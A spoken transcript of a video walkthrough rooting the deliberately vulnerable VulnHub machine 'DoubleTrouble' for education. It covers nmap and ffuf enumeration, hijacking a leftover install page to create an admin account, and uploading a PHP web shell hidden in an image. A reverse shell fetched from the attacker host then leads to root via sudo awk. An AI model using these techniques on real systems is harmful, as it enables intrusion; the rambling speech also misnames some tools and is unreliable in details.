All right. Welcome. So I'm Nathan Bighetti. This is going to be a video. It's going to be a walkthrough um, on a virtual machine, a vulnerable virtual machine available on VulnHub called DoubleTrouble. Um, yeah, so if you're doing the CTF and you're interested to know how I got root, um, feel free to tag along. Um, the way I did was a little bit different. Um, After I rooted the machine, I went back and I looked at some walkthroughs and the CTF, the CTF style where you find clues along the way and it guides you, through how to get root. That wasn't the way I did it. I did another way, and I think it was very cool. This was the first machine I was able to root without any help, or not any help, without looking how the CTF was supposed to be done, right? And it ended up being a little different from the usual, the normal pathway. Anyway, let's get started. I'm going to start my DoubleTrouble. Always make sure they're on the same network, using the same adapter. Alright, DoubleTrouble is booted. Now let's wait for Kali Linux. Alright. Nope. And we are logged in. Let's check. I'll get to check 10.0.7. Can we ping 101.1? Cloudflare. We have internet access. Now let's see if we can actually. Oops. And we can see the machine here. So when I first started doing CTFs and trying to root vulnerable machines, hosting getting from VulnHub and hosting locally here. So these three IP addresses, one is for the gateway, and the other two, they are, I'm not 100% sure, right? But they are, or I don't know exactly what they are, but they are some type of network adapter that's making that connection between our host machine, our host OS, the Windows, with the virtual machine, Kali Linux. Anyway, so you can usually .1, .2, and .3 there. They're just going to be network adapters, router, and then the .15 is the one that we are going to be attacking. It's the target machine, DoubleTrouble. Another way we can make sure of this, and that is the scan we're going to be doing later, but before, we can do a ping sweep using Nmap as well. 0.2.0/24, then -sn. This is to see all if they are online, of what machines are alive in this network. So what we're doing basically, we are Nmap's gonna try all the IP addresses from 10.0.2.0 all the way through 10.0.2.255. 0 to 255, yes. Actually, dot 1 through 255, yes. So that's what Nmap's going to do. It's going to do a ping sweep there to see how many IP addresses are taken, how many of them are alive. Dot 7 is our machine. Dot 15 is the other virtual machine hosting the virtual box. You can see here, and then as we can see here, this most likely is the router, and then we have a NIC, network interface cards, and we have another NIC here. Probably, I'm not sure, but it should be something, to make that connection between our host system and our machine, our virtual machine. But dot 15 is the one that we want. So now we are going to start the active reconnaissance part. So before all that, let's actually, I already have a folder here because I already rooted the machine, but I'm gonna guide you through everything. Okay, so now we saw the machine is alive, so we need to know what ports, what is available in the machine, so we can, attack it. We're gonna do a -a. So we're gonna do nmap -a for aggressive scan on CTF style, where there's no blue team, to block traffic from a specific IP. Doing this scan shouldn't be a problem. Because if we were facing something like a blue team or something IPS or IDS, actually IPS only, because IDS wouldn't be able to stop our traffic. IPS would. If there was an IDS with some type of team monitoring those responses from the IDS, then potentially they could see those scans, aggressive scans, and then drop that traffic as well. So indirectly, IDS would still be a security control there that could be used. But here's the CTF. There is nothing like that on the machine. So we're going to do an aggressive scan, and then we're going to change the timing, the speed of the requests. Nmap has speeds 1 through 5. We're going to be using default is 3. We're going to be using 4. So it's an aggressive scan, time 4. We're going to put in the IP address of our target, 10.0.2.15, and then we want to do all ports. Yes. If you leave empty, Nmap's gonna go with the top 1,000 ports but we want to do a thorough scan of all the ports on the machine. So all the 65,535 ports, yes. I'm not gonna do this, but I do recommend you doing this here if you're following along. So -O, big N, capital N, and then you can write the output of the command to a file. And by default, ON, it's a text file, and you can name anything, right? So nmap, aggressive, scan, something like that. But I already have mine saved, so I'm just gonna run the nmap scan without saving the output. Let's go. So this is gonna show us, all the ports that are open on this target. Well, now it's good to mention that this is an internal penetration testing type of assessment, right? Our attacker machine is sitting in the same level, in the same network level as the target machine. So there is not a network firewall separating the networks, so this would be classified as an internal penetration testing, yes. Alright, so Nmap finished its scan. Looks like we don't have a lot of ports open. We have 22 and then 80. 2022. Port 22 SSH. As penetration testers, we wanted always to be checking the version of those services running. When we check the version, we can see if there is, if it's outdated or not, and then we can also check if there are known exploits there to exploit that vulnerability. In this case, in this machine, this won't lead us anywhere. Or I should say, there are no low-hanging fruits in there. I didn't really give a really, I just did the basics. What are the basics, right? So after we do some reconnaissance, we try to get, a username or potential usernames to try to brute force a login on SSH that gives us access. There are some default username and passwords we can try, but at this point, we other than trying a brute force attack or seeing if there are known exploits to this service room, and there's nothing else we can do easily. And like I mentioned, I already ran some scans, I already tried a couple things with SSH. I didn't find anything in there. And it looks like for this particular SSH version, there are a couple exploits available, not for remote code access, but involving some other parameters. One of them that I read, it required that the SSH service was set up on another port, on a non-default port, 1958, I think, something like that. And then, and it was an RPC type of service that involved SSH. I'm not 100% sure on that, so I just went with HTTP service and I dived in there to see if I could find something in that other service, because To the best of my knowledge, I couldn't do much on SSH. Luckily, I found uh, something on an HTTP service. So I'm gonna show how I found it. And there's another thing, right? HTTP is a big protocol. There are many features, and usually it's a good place to look for vulnerabilities. SSH is not really known to have um, that many vulnerabilities, but we definitely need to check the version, see if we have an easy win, and then, of course, if we had a username, potential usernames, we could try to run a brute force attack, but that's not the case here. All right, so we're gonna start enumerating um, further on HTTP service. In the nmap scan here, we can see nmap found they're running Apache 2.4.38. The version of Apache, there's a login page right there. I didn't find anything else. It's a Linux operating system running the service. So yeah. All right. So the next step would be to go, to the website and try to see what is in there. Click around. Of course, we're gonna use Burp Suite. But no, it would be you would go to enumerate this website, just very thorough. But I'm gonna skip all the clicking, all the investigating, and I'm gonna go straight to what I found. So first, it's not open yet. So first we want to intercept a request here because we're gonna use it to run another tool called ffff, which is the tool we're gonna use to brute force some directories, to find some other directories on the website. If we go to the website, let's try again. Okay, still starting. Okay, start that way. So if we go to the website, we can see there is only a login page, and then we have this other page here that is just to recover your passwords. Actually, this system right here, this forgot password, it's actually vulnerable. We can actually use this to enumerate email addresses. Yes, because when we go here and we say, admin.com, and we send it, no records found. So when I didn't do the proof here, right? I haven't done the proof, but it looks like that when we have a valid email address, it's gonna show in the message right there. So that's how we're gonna know how which email addresses are valid or not. So this is actually a vulnerability of this feature here, but we're not gonna be exploiting that. Actually, we're not gonna be exploiting this. Nothing that is showing on the that the website builder wanted us to actually see. You can see we only see 2 pages. There's nothing else. We can go to page source and such to see if there are other pages, but we're gonna do that using ffff. So what we want to do, we want to intercept one request from the website, so we can copy, then Control C, and then I actually have mine here already. No, let me do this again. Let's do mousepad. We're gonna call it directory root level -01. So we first are going to try to find directories at the root level, right? Which is right here. So copy that request or paste that request we copied from burp in the mousepad, save it, or before saving it, we want to write fuss right here. So when we run ffff, the tool I'm gonna show, the tool is gonna come look at this request. It's gonna look at fuss, and it's gonna replace that word with other directory or directories names, folder names, directories names. Yes. Anyway, it's gonna replace with other folder names from a big list that we're gonna use as another parameter, and the ones that return 200 code are the ones that exists, right? And of course there are a couple ones we're not gonna have access, which are also gonna return as directories on the website. Anyway, save that request there. Don't forget to put the fuzz in there. Let's make sure this has the right. Okay, now we're gonna run ffff. We're gonna do request. Let me explain everything here. So ffff, the space dash request, and then we're gonna this is the text file we saved that request to. So it's right there, directories, root level -01, and then we need to tell ffff the type of the request. So we put in -request -proto for protocol but short, and then it's HTTP, and then put in the -w for word list, and then my word list in my Kali Linux. Probably if you're using Kali Linux version, it's going to be in the same directory there. User share word list derb, and then I'm going to use big text or big.txt. And of course we want to route that. There are other ways to do this, but we want to put in a file. We're gonna call it root level directories results, because we already have something there. And then let's run it. So you see what's going on here. It's actually you see here, this is the request. It's like it's almost like, of course it is not, because it ended in 59 seconds, less than, or 12 seconds actually. 59 requests per second. We ran over 2,000, or yeah, 2,469, not over. We ran that exact number of requests in 12 seconds. That's quite impressive. So what was basically doing, it is as like we would go to the browser, we would type that URL in there, and then replacing with directory names that are directory known directory names in there to see if we could see something, if there was something on the back end. Now we need to catch this root directory results, and here are the directories found on that command. So we found HEPass, passwd, haccess, htaccess, backups, batch, core, CSS, secret, which is we definitely want to go there and look at. I already went through a bunch of folders, a bunch of directories there. The one that I was able to use, and it was really nice, it's this install folder here. And I'm gonna show what's going on with this install folder here. So after you install, and this is this is not WordPress, is this WordPress? I'm not sure. Anyway, after you make this, you install the website framework, you need to delete the install folder. And in this case here, the install folder is still there and allow us to connect a database with the data as the website's database. I think that's I don't think. I'm pretty sure this is a vulnerability, a big vulnerability, and I'm gonna show how to exploit it. I didn't read a lot about this rule, but after I finished it, I saw the way to do it is a lot different than this way. This is how we're gonna get an initial access to the website, and then through that initial access to the website, we're gonna get an initial access to the hosting system, to the underlying system, the one that's hosting the website. Actually, the way they want us to do it is going through there is an image somewhere, I think it's this fav icon here. In that image there is metadata, right? That's the word. And then you need to use tagsolve to extract that metadata from the image, which contains a file, and I think it's a password file, and then you can crack it with John, and then that file, you actually have credentials to log in as a user, and then after you log in, then you can you further enumerate the website with more functions. And then I don't remember how you get root, how you get initial access on that walkthrough, but anyway, so now we need to spin up a database. We're gonna spin up our database and then connect with theirs, or not connect with theirs, connect with their website. And it is perfectly fine. If you don't remember how to spin up your database, I don't remember how to do mine, so I have my cheat sheet here. We're gonna do a sudo systemctl. Let's see if it's running already. Maybe it's running or not. It's not running, so we're gonna start it. Systemctl shell start MariaDB. Nice. And then we need to not only spin it up, we need to make a fake database. We need to actually make, not a fake database, we need to make a database and set parameters so we can actually connect it. It's like if it doesn't have all the parameters there to make that hook, to make that connection, it doesn't do it. Almost like this, right? Because you could actually try to just put some whatever in here, and I tried already, like localhost database port 21, and then you put admin, and then you try it, but there is not a connection going on there, so you can't just put anything in there, so you can get to the next step, which if you do the way I'm gonna show you, you'll be able to. We're gonna be creating actually an admin for this website. Now we need to configure, and then yes, we do need to check at least. Then I think it's gonna be here, hopefully. MariaDB config server. Nice. Now we go. I'm hungry. Bind address. Okay, we already have it. 127. So this is localhost. We want to change it to 0.0.0.0. This is to allow all connections. This is highly, don't set up your database like this, right? But this is to allow all connects. I think, yeah, much, yeah. Okay, so I think that's it. We save this file, and then we're going to restart MariaDB. Now, database database is set up, or it's not completely set up. This is just we spend the database is up and running. You can see it's up and running. Oh, it's still not. No, it is running. Yes. So now it's ready to make that connection, but we don't have tables, or we don't have the actual database, because when we make that connection, as you can see here, we use a database username and database password. So it's going to be the database username and the database password that for the database we created. So we need a database to actually make that hook. And here's how we're going to do it. We're going to start. Do we do? Yeah, MySQL, right? Yes. So we do. So we want to. We're gonna do with root user. Good. Welcome to MariaDB. Blah blah blah. As you can see, MariaDB. There's right now we don't have anything in there. MariaDB none. So we're gonna create database. And these parameters, it's good to take notes because we're gonna be using them to actually make that tag. So the database name is my underscore website. Blah blah blah. My website that underscore db. So my underscore website underscore db. We're gonna create this user called web user. You can call anything you want. We're gonna do at percentage, then divide by, and then we can so this is where you're gonna create a password for your web user, the name web user, at percentage what the percentage does there, I forgot now. User identify with strong passwords. Okay, and then we're gonna grant yes all privileges on my website db dot star to web user at percentage. I don't remember why do we need to use the percentage. Grant privileges on my website db web user, but we do. Then we flush privileges. Okay, so we do have it was created. Select everything from. No, actually, we need to use so we can actually. It doesn't autocomplete. My website for DB. Okay, and then we're gonna show tables. Actually, how do we? Doesn't have a table. We should have a table, right? Oh. Okay, I was gonna try to check it, but I think this should be enough. Let's trust. Clear. Okay. So if you're following along, okay, so the website, right, it's 10.0.2.15. Our IP address is 10. We wanted to connect back to our database with the one we just spin up. So we want 10.0.2.7, our IP address. Database port, I believe it's default. Let's not just believe, let's Oops, I'm sorry there. Let's see here. 3306. Okay, so it's running on that port indeed. And then we have web user as the username. Password, we have that strong. Password 1, 2, 3. Hungry. Alright, and now the magic is supposed to happen. Let me double check. Oh yeah, database name. Almost forgot. We need to change that as well. My website DB. And it should work if you had other names to your database there. Let's make sure everything is correct. String password 123, web user, website 3306, 10.0.2.7. Haha. Alright. So you see, we connect to our database. Now the website actually prompts us to create an email address and a password. Write that down, because otherwise, right, if you change it or do something, write that down, because that's the one we're going to be using to actually connect with or do initial access on the website, because so far we didn't have it. Localhost.com. And as the passwords, let's put it password. I don't want to make it really difficult. If there are any requirements, we just want to fulfill those requirements. I'm gonna have password 123 exclamation point, exclamation mark. Alright, so admin at localhost.com, password 123, and the rest you can leave it default there. The most important is this part. And then we can double check, password 123, admin at localhost.com, admin with, wait. To make sure. Alright. Then you can take a screenshot of that as well. And then it prompts us, do you want to log in as the administrator? Do you want access to the website? Please give me access to the website. Admin at localhost.com, password 123, exclamation mark. No, don't save it. Ta-da! And we have initial access to the website. We didn't have to do stack solve with any pictures or none of that. Forget it. This is the way. Find that install folder there and take advantage of it. Alright, so what now here? We have the admin user, and then we're gonna go. The idea we get another access. We have this admin page now. Admins usually they have a lot of features, that can give us some good pathways in there. You're welcome to look around, but the one that I was able to the fields that I was able to inject malicious code was this one right here. So what is the next step of the attack? We have access to a to an admin user on the website. Now the next step is to try to get an initial access on the underlying hosting machine. We're trying to get access to the kernel, to the underlying OS. How can we do that, right? That's a good question. There are many ways on how you can exploit a website. This one in particular, we are going to be uploading malicious code through this logo, whatever this is. Or let me explain it a little better. Let me show you first, and then I'll explain it. Because as I go, it's basically we're going to be injecting code in an image, and then we're going to be forwarding that image to the server. Their server is going to accept that image, and then it's going to put that on the folder that we have access called uploads. And we saw that folder on that request when we busted the directories for that first directories at the root level .01 directories root level 01. Here, oops, this is the we want the results, or is it just okay? So just this, yes, and then right here uploads. So that's what's gonna happen. We're gonna inject an image with a malicious code in there. That image is going to be hosted by the server, and when we navigate to that image's path on the URL, that's gonna make the PHP code injected on the image execute and make that we're not gonna have a connection back. We're gonna actually be able to have remote code execution. Yes, that's gonna allow us to run some codes in the machine, and then we're gonna make the machine make a connection back to our machine. Anyway, let's do this without further ado. We actually need an image, and I do not have an image. I think I'm gonna use this. Or do we have another image here? Maybe we have. I'm gonna go images. Okay. Oh, we can use this. I think. Here's an image, right? Save it as an image. That's what I want to do. Okay, we want to go. Oh, it's not a desktop. It's the. Let's call it. Image for malicious image. Alright, and then we have an image. Good. Now, what we're gonna be doing here, and this is all being as you can see, this is all being captured on burp. Do this. Okay, so we are going to, let's just send, first let's do the, um, so the idea is we first, how we test file updates, right? We first start with a payload, something that works, and then we escalate from there, right? So we want to try to, just capture some traffic on a normal, um, there are no malicious code or anything in this image right now. So there's not a reason why this shouldn't be uploaded, right? So we do that, and then we save. Let's see, configuration, and there we go. And then we can see that traffic here. Beautiful. So this is, as you can see, this is the image, data. Yes, this is the image data. So what we're gonna do, this is the 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 the, the beautiful part. We are going to forward this to repeater. Oh, sorry about that. My cat is asking for some petting. Um, just a second. All right. So what we are going to do, we are going to inject some code in this image here, and we're gonna change the file extension. So when it reaches the server, it executes the PHP. Because if it's just a PNG, it won't execute it automatically. We are in repeater. We're gonna change this here to .php, and then I think on the second line here should be enough, like right there. Yeah, that should be enough. So if you try it at first and then it doesn't work, actually let me get out of this. Yeah, let me put it right there. You can always, if the, if for some reason doesn't work, if the server doesn't, if the file is not saved to the server, then we need to change this, we can try to add it later on the image code, or maybe a little before. We can try to delete some of the images code. It doesn't matter, as long as the server actually saves it. So, oh yeah, and you can see so what we're gonna be putting in there, it's this little piece of PHP code. PHP, we're gonna try to inject this code here, which is going to generate, I can't see, it's a normal payload, but I don't remember. System, be all together, open parentheses, $ underscore get. Oh, and it's not typing it. So, okay, so parentheses, $. I'm sorry, so that is lesser than, lesser than sign, interrogation sign, PHP space system, parentheses, $ underscore get, open bracket, single quote, cmd, close single quote, close bracket, close parenthesis, and then comma, right? And then we are actually space, then we end the PHP statement right there. Okay, so we're gonna inject this on burps here. Control C there. I'm gonna actually, let's put in the lower one. Just let's see if it works on the other one. Yeah, what the heck? And it's right there. PHP systems, blah blah blah. PHP system $ underscore get cmd. So this is actually you're gonna see we're gonna be able to actually, if it takes it, see, they not found. Okay, let's see if it took it. So here it says it was not found. Can we render this? Let's just see how it's gonna look like. And maybe it's not gonna be able to render it. Let's see if it's in there. We can actually go. This would go to uploads, yes. Like I said before. Alright, so the image is there. It looks like the system took it. Now it's where the magic happens. We are actually going to open that page, and then you see it doesn't render anything because of that code in there. But when we go like this, maybe we have to put quotations. No, we don't. Okay, so you see, we can actually issue commands. So what's going on? We upload a malicious image. That image takes, it's capable, because it was uploaded with malicious code, we can actually send parameters to that. It's going to be replaced on that CMD that we put in that code, and then it's going to execute who am I, right? So it's actually executing that PHP code with the parameter or with the variable instead of CMD like we put in the code, it's actually executing with who am I, and then it shows on our end here www data. We can also do host name DoubleTrouble, which is the machine we are trying to get in. Perfect. So it's working. So now we're gonna create a reverse shell through this PHP code. If you actually try to, because you're welcome to try to actually instead of only uploading an image, you can try to upload a reverse shell, right? And then we don't have to go through all these hoops. I wasn't able to do that. So that's the way I found it. Because I tried a little bit uploading the whole reverse shell, but it wasn't taking it. So I just, okay, let's do this. It took it, and I knew how to do it. Anyway, so now we're gonna just make a simple reverse. It's going to be just a bash. Or should we use a bash, or are we? Okay, first we would need to check if we can actually do a wget or something like that. And actually, we are going to upload. No, but we can't run that. Or can we? Yeah, that's what we're gonna do. So yeah. No, actually we can try to just run through this command, we can try to do a reverse shell right there and then. Let's try. Oh no, it didn't work. That's why I didn't use it. Okay. Okay, because there are too many line terminators, and then through this here it's gonna be tough. Okay. So yes, so we actually are going to do another thing. Yeah, we are. No, it's the same idea, right? We have this reverse shell, and it's done through that code we inject on that malicious on that image. But now we first are going to upload another file to the system using this method here, using this payload we injected, because we can't put that file in there through nowhere else, right? So this is the only place we were able to use. I was able to use to upload that file in there, so we can make that connection back. We can actually. Oh, my back's killing me too. Do we use? I think we have. I'm trying to remember where it is. PHP web. Ha, nice. So we're gonna go there. Which one? Web shells. Yeah, we want web shell. Let's actually see what that is. Cat user share web shells. Web shells want PHP. There are many, but our PHP reverse shell. Is this the one? Yes, this is the one. This is from Arctic Monkey. Yes. Oh, Pentest Monkey. Arctic Monkey. Pentest Monkey. Yes. This is a famous one. This is the one I'm going to be using. We are actually going to copy that. You can actually copy this URL right there. Copy user share web shells. We want to copy it right here. Just gonna call it rev .php. And right there. Okay. Now we wanna host like a fake, not a fake, right? But host a server so we can serve that file. Python 3-m http. What's the Python 3-m http.server module server. I don't remember. And then we can put ports. Let's put 8080. Okay, I need to be a little more. No, it's still down. Am I running this HTTP? I don't remember if I'm running this correctly. Let's do a quick Google search. Python 3 HTTP server. Oh, this is HTTP server. HTTP.server. Maybe port 88 is taken. Let's try another port. Yeah, it's actually address handler HTTP. Is it? Oh, could be because of MySQL. Yes. Okay. Let's try port 222. DoubleTrouble. Let me make sure the file is actually there. Okay. Then we are going to run a wget. Okay. So that's why we would first try, like the idea I mentioned before. We would first initiate with get to something that works, right? So first we would try to upload a text file using this method, and then after we successfully upload a text file, we try to upload a PHP file, so it makes that connection back. I already tried, so I'm just gonna do the PHP directly. So what we want to do here is just a wget http oh http yes // that's right, 10.0.2.7 our IP address on port 2222 rev.php, which is the name of the of that file. Okay, looks like it took it. We wanna go there to see 10.15. It actually get uploaded to the uploads, which is where the image is. Yeah, revshell.php, so it's there. Perfect. So you see it worked. Now we need to. Oh shit! I forgot to make. Shit! I forgot to make one crucial, fundamental change to that file there. I completely forgot. Rev shell php. Anyway, so here what we want to change, because this file is going to make a connection back to our machine. So we want to put our IP address there, pointing to our machine, and then the port we are going to use, let's use blah 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 3333. So 10.0.2.7 our IP address, 33 all threes for the port. There's nothing else we need to change here. You can also try to change the shell that it gives us, but this should do us fine. So it's saved. Now we're gonna close. We need to serve the file again. Actually, let's call this rev shell something else. rev1.php. Good enough. And then we need to do part 22. I forgot where, blah blah blah. Need to go to this one here. And then we can do cmd w. No, we don't want to do this. Yeah, we want to do this. wget http //10.0.2.7 on port 2222. Right? Yeah. And then we want to retrieve the file called rev1.php. Good. There we go. And we can see the file was served here as well, rev1 200 codes. We can kill that connection. So now we need to do a netcat connection, or open a netcat listener to listen to that connection back. And we're gonna do this with netcat-nvlp port 3333 port 3333, and that's gonna make our connection back. Alright, let's see, and it's hanging, and we have an initial access to the underlying OS. Let's kill this just to make sure, right? We're gonna do who am I, www.data, host name, DoubleTrouble IPA 10.0.2.15. Alright. And I believe this, if I'm not mistaken, this, because we didn't even get the version here, right? We didn't look anything on the website, but I think the version of the website actually has a known exploit you can use. But do this way, it's better. You can, you can learn. And that this technique I actually learned from a TCM security instructor, right? Called Alex. Yeah, he does the web, much of the web application testing, right? Over at TCM, or it does the videos, right? I don't know if it does testing, but probably it does testing, but he does the videos in there. Anyway, now it's privilege escalation time, and there's not a lot of difference between the way I do it or the way the actual CTF walkthrough does it. But you're welcome to tag along. There are many things we can do right now. We can try to import more software to the underlying machine to make that scan, to try to find some paths on how to escalate privileges. Let's do -L. Okay. So here's how we're gonna do ours. I think they do the CTF walkthrough also does this one. So everybody can use, or users, www.data. Not everybody, I'm sorry. www.data, the user we are right now, can run this awk command with sudo privileges, right? And so this is something. Let me show you this. Much of the privilege escalation on Kali Linux, from what I've seen, of course, it's not going to be only this, but it's going to have this. You can check on this website if there are known exploits for this privilege escalation. Let's try privilege Linux. And let's see if it shows Linux privilege escalation sudo. Oh, because yes, this is because I didn't add the Portswig certificates to Mozilla Firefox yet. So we're gonna do. I'm not gonna do that right now. I'm gonna disable it, and then we're gonna do GTF. What's the? I forget the name of the website. GTFO bins. That's the one that we want. Here, this website, they have. So these are known privilege escalation paths. If you have either SUID on a critical command, or if you have sudo file or sudo permissions on a command like we do, and this is pretty easy because it's a, right? So a awk command is right here. So what we do, it's pretty easy. We just run this command, or is it this command that we run? Actually, no, we have this command, yes, because we have sudo. This one is for SUID. If you have SUID, can I show you that? Or after we get root, I can show you that as well. So we just get this command here, copy, and we're gonna paste it in there. And then when we say who am I, root, host name, DoubleTrouble, IPA, now just to make sure we are root. Let's go to root, cd root, show that we can actually go there. DoubleTrouble OVA. So this actually this machine, one of the peculiarities of the machine is that there is another machine on that you can actually extract that machine and then root that machine as well. We're not gonna be doing that today. This is just to root this machine we are. If I wasn't root, I wouldn't be able to do that. Let's go home because I think there are some, or not. I thought there would be some flags. Can we see bash history? No, we don't see bash history. Well, if there were, I don't know if there are or not. Like, like that there are actually flags you need to capture on the challenge, but getting roots allow you to look at pretty much anything your root. I don't know where the flags are. I think their flags are actually on the other machine that we need to extract to make that exploitation again. But there you go. That's how you can get root on this machine. It's a pretty nice, pretty fun way how to do it. You get to spin databases. You get to create a database. There's a quite a lot of knowledge that you need to have in order to do that, right? So I think that this is something really educational, and I don't know. I wanted to show it was really fun to do this one. It was the first machine I was able to root it completely by myself. And then afterwards, looking at the walkthroughs, I was like, I did a lot different from the walkthroughs. That was exciting. Anyway, um, if you're still here, thank you for watching, and I'll see you in the next video.